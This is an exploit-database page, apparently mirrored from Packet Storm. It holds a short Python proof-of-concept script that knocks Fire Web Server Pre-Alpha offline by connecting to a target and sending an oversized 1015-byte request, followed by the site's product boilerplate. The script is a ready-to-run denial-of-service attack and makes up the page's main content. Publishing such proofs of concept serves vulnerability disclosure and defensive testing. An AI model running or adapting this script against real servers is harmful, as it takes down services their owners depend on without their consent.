Lucene search
K

Fire Web Server Pre-Alpha Denial Of Service

🗓️ 26 Jun 2020 00:00:00Reported by Saeed reza ZamanianType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 185 Views

Fire Web Server Pre-Alpha Denial Of Service attac

Code
`#!/usr/bin/python  
'''   
# Exploit Title: Fire Web Server (Pre-Alpha) - Remote Denial of Service (PoC)  
# Date: 2020-Jun-26  
# Exploit Author: Saeed reza Zamanian  
# Vendor Homepage: https://sourceforge.net/projects/firewebserver/  
# Software Link: https://sourceforge.net/projects/firewebserver/files/  
# Version: Pre-Alpha  
# Tested on: Windows 7 , Windows Vista  
  
'''  
import socket,os,sys  
  
if len(sys.argv) < 3:  
print "Usage: python fwspa_dos.py targetIP targetPort"  
else:  
print "[*] Sending evil http request to target"  
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )  
expl.connect((sys.argv[1], int(sys.argv[2])))  
expl.send("A"*1015)   
expl.close()  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

26 Jun 2020 00:00Current
7.4High risk
Vulners AI Score7.4
185